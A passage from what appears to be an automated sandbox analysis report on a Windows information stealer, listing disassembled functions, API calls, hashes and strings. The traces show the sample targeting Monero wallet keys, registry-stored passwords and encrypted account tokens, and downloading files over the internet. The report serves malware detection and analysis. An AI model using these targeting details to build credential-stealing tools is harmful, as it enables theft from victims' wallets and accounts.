                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF93C0: GlobalAlloc.KERNEL32(00000000,00BF43DD,00BF43DD), ref: 00BF93D3
                              • StrStrA.SHLWAPI(?,009BEDD8), ref: 00BF43F3
                              • GlobalFree.KERNEL32(?), ref: 00BF4512
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
                                • Part of subcall function 00BE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
                                • Part of subcall function 00BE9AC0: LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF44A3
                              • StrCmpCA.SHLWAPI(?,00C008D1), ref: 00BF44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BF44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00BF44E5
                              • lstrcat.KERNEL32(00000000,00C00FB8), ref: 00BF44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: fc528627f922c07dc8a4019cb1e37da08c85310f9b318a5551222dd14573260d
                              • Instruction ID: 4421037e2f17d2dd43a0937130e590c6d2488d23f9f4f57e40db0452c1a7e20c
                              • Opcode Fuzzy Hash: fc528627f922c07dc8a4019cb1e37da08c85310f9b318a5551222dd14573260d
                              • Instruction Fuzzy Hash: 2E7116B6900208ABDB14EBA5DC9AFFE73B9AB48300F0445D8F605A7181DB74DB5DCB91
                              Function 00BE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE12B4
                                • Part of subcall function 00BE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE12BB
                                • Part of subcall function 00BE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BE12D7
                                • Part of subcall function 00BE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BE12F5
                                • Part of subcall function 00BE12A0: RegCloseKey.ADVAPI32(?), ref: 00BE12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00BE134F
                              • lstrlen.KERNEL32(?), ref: 00BE135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00BE1377
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BE1465
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00BE14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: d75723db22a15d0cd6f1bec928106391ee5a378b01ec068e0ec5b4269a3ff2f9
                              • Instruction ID: 1e4e33bedf52f485c5b20b49551eda36eb9292903f6c1939f618776f6425be75
                              • Opcode Fuzzy Hash: d75723db22a15d0cd6f1bec928106391ee5a378b01ec068e0ec5b4269a3ff2f9
                              • Instruction Fuzzy Hash: F95130F195011D5BCB19EB64DD96AFD73BCAB50300F4045E8B70E63092EE706B8DCAA6
                              Function 00BE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BE733A
                                • Part of subcall function 00BE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
                                • Part of subcall function 00BE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
                                • Part of subcall function 00BE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BE7452
                                • Part of subcall function 00BE72D0: HeapFree.KERNEL32(00000000), ref: 00BE7459
                              • lstrcat.KERNEL32(00000000,00C017FC), ref: 00BE7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BE7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00BE765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BE768F
                              • lstrcat.KERNEL32(00000000,00C01804), ref: 00BE76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BE76D3
                              • lstrcat.KERNEL32(00000000,00C01808), ref: 00BE76ED
                              • task.LIBCPMTD ref: 00BE76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: ab5d7ef0ab6c6f5c6fabff11322bacab5a3859a2aa74027c418c1500478717f9
                              • Instruction ID: 334011c46763211594bb1554de80464035a3c67b6a313ed78bb47a18de0dc282
                              • Opcode Fuzzy Hash: ab5d7ef0ab6c6f5c6fabff11322bacab5a3859a2aa74027c418c1500478717f9
                              • Instruction Fuzzy Hash: AE313EB5900149DFCB18EBA6DC9ADFE77B4BB48301B184168F106B7291DF34A94BCB52
                              Function 00BE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                              • InternetOpenA.WININET(00C00DF7,00000001,00000000,00000000,00000000), ref: 00BE610F
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BE618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BE61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00BE61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BE620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00BE6249
                              • InternetCloseHandle.WININET(?), ref: 00BE6253
                              • InternetCloseHandle.WININET(00000000), ref: 00BE6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 151d5e74e92f3b4c1d11f6423020ca421bb1f9bab9923b61e2bccfaf8b0da68d
                              • Instruction ID: 1511cbe1ff928f01292a04aa87ea47b10a77ee7574c20b042f731ecf04ff2236
                              • Opcode Fuzzy Hash: 151d5e74e92f3b4c1d11f6423020ca421bb1f9bab9923b61e2bccfaf8b0da68d
                              • Instruction Fuzzy Hash: D7516EB1900218AFDB24DF51DC45BEE77B8EB04741F1080E8A709B71C0DBB46A8ACF96
                              Function 00BE72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BE733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BE7452
                              • HeapFree.KERNEL32(00000000), ref: 00BE7459
                              • task.LIBCPMTD ref: 00BE7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 25e37e5d6d54ab71947d7c130c267d50e5d21583ed93a09431510bd3b8be4322
                              • Instruction ID: c641188625804b4899a5e6265f37b2b577805dfe71e485eb8de2daf2eedb542f
                              • Opcode Fuzzy Hash: 25e37e5d6d54ab71947d7c130c267d50e5d21583ed93a09431510bd3b8be4322
                              • Instruction Fuzzy Hash: 8A612AB58442A89BDB24DB51DC45BD9B7F8FF48300F0481E9E649A6281EF705BC9CFA1
                              Function 00BEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              • lstrlen.KERNEL32(00000000), ref: 00BEBC9F
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BEBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00BEBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00BEBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: f5ebe2ff842e484543de78c3a54aadbb16dfba341a10ce0aef148d581a99219f
                              • Instruction ID: 03f83e694f5ee0d534e4b61b45f12d12dba7ebb171e7b0014c9d8533ffa4d132
                              • Opcode Fuzzy Hash: f5ebe2ff842e484543de78c3a54aadbb16dfba341a10ce0aef148d581a99219f
                              • Instruction Fuzzy Hash: 83B111B191010C9BDB18EBA4DD56EFE73B8AF54300F4445A8F60AB7091EF746A4DCB62
                              Function 00BF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: f6f69557cfc55a999802c8700e52c0b74cfb073db0dd06ad38b1ce4f37be9c04
                              • Instruction ID: 5b5291c18519f31b3525faa8a4f459ad41e7b1d9ec0fc2dc540a1e1a2b3b16f8
                              • Opcode Fuzzy Hash: f6f69557cfc55a999802c8700e52c0b74cfb073db0dd06ad38b1ce4f37be9c04
                              • Instruction Fuzzy Hash: 67F05430904209EFD354AFE1E90972CBB70FB14703F0801A9EA05D7290D6704F46DB9A
                              Function 00BE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BE4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE4FD1
                              • InternetOpenA.WININET(00C00DDF,00000000,00000000,00000000,00000000), ref: 00BE4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BE5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BE5041
                              • InternetCloseHandle.WININET(?), ref: 00BE50B9
                              • InternetCloseHandle.WININET(?), ref: 00BE50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8b38bd6b15a9c7758caaad2e3daefdb3f945f8d946960f08ed794c121bf6050e
                              • Instruction ID: ef199f2d2ab2dc8301d761e276b3727fe5a84f1b2478219c8ada4fab431fd861
                              • Opcode Fuzzy Hash: 8b38bd6b15a9c7758caaad2e3daefdb3f945f8d946960f08ed794c121bf6050e
                              • Instruction Fuzzy Hash: A13106B4A00218ABDB24CF55DC85BDCB7B4EB48704F1081E9FB09B7281C7706A898F99
                              Function 00BF8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009BE8C8,00000000,?,00C00E2C,00000000,?,00000000), ref: 00BF8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BF8158
                              • wsprintfA.USER32 ref: 00BF81AC
                              Strings
                              Memory Dump Source
